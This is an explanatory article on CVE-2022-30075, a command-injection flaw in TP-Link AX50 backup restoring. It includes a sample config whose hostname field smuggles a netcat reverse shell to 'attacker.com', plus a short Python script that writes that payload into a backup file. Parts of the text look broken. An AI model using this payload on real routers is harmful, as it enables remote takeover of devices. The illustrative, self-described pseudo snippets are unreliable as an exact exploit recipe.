Routers are the backbone of our home and office networks. Many people trust their routers to keep hackers out—but what if just restoring a settings file could let an attacker break in? This is exactly what happened with the TP-Link AX50, one of the most popular Wi-Fi 6 home routers. In this long read, we’ll break down CVE-2022-30075: what it is, how it works, and why it matters. We'll even look at code snippets and real exploit examples, written in easy-to-understand terms.
What Is CVE-2022-30075?
CVE-2022-30075 is a serious security bug found in TP-Link AX50 routers with firmware version 210730 and earlier. This vulnerability lets an attacker run their own code on the router just by tricking someone into importing a malicious backup file through the router’s web interface. This type of bug is known as remote code execution (RCE).
Original Reference:
- NIST CVE-2022-30075 Entry
- GitHub PoC & Writeup by Nguyen Jang (the discoverer)
How Do TP-Link Backups Work?
Most routers, including the AX50, have a feature in the admin web page for exporting and importing backup settings. You can save your setup in a file and restore it later. This is handy for upgrades or resets, but, as it turns out, it can also be a big security hole if the imported file isn’t checked properly.
A typical backup file looks like encrypted or compressed text, but inside, it can have settings and, unexpectedly, code that the router could execute after importing.
What Went Wrong: Lack of Proper Validation
The core issue with CVE-2022-30075 is improper validation. The router accepts backup files from anyone who is logged into the admin panel and fails to carefully check the contents before importing. Attackers found they could sneak in special commands that would get executed as soon as the backup was restored.
Attacker crafts a malicious backup file.
2. Victim/admin user uploads it via the router’s web interface.
Code Snippet: A Poisoned Backup File
Here’s an example of what an attacker’s payload might look like. The details are tailored, but the essence is that some field (like device name or a script/PHP field in the config) is stuffed with malicious shell code.
<!-- Pseudo config.xml, packed inside backup file -->
<network>
<dhcp>
<hostname>;nc attacker.com 4444 -e /bin/sh;</hostname>
</dhcp>
</network>
When the web interface restores this config, it runs commands set in the “hostname” field—a classic command injection vector. The sample above tricks the router into dialing back to the attacker’s server and giving remote shell access.
Create the Malicious Backup File
Using a text editor or script, inject system commands into the backup’s fields (as in the code snippet above).
Exploit Example (Python Snippet to Generate Malicious Config)
import base64
payload = ";nc attacker.com 4444 -e /bin/sh;"
xml = f"<network><dhcp><hostname>{payload}</hostname></dhcp></network>"
# The real backup file is encoded/packed, but this is the dangerous part.
with open("malicious_backup.cfg", "w") as f:
f.write(xml) # For a real attack, wrap/encode as expected by router.
Other devices on your network may be at risk.
Even though this bug requires access to the web admin interface, it’s a real danger in shared environments or if your admin password is weak or leaked.
TP-Link fixed the bug in newer versions.
- Download Center for Archer AX50
More Reading
- Original CVE-2022-30075 Details on NVD
- Technical PoC and Technical Analysis by Nguyen Jang
- Firmware Updates on TP-Link Official Site
Final Thoughts
A simple settings file shouldn’t be a door for hackers—but in the case of the TP-Link AX50, it was. Always keep your firmware updated and beware of “magic files” from unknown sources. Sometimes, security issues are hiding in the tools we trust the most.
Have questions about router security? Leave a comment and join the conversation!
Timeline
Published on: 06/09/2022 04:15:00 UTC
Last modified on: 06/20/2022 19:15:00 UTC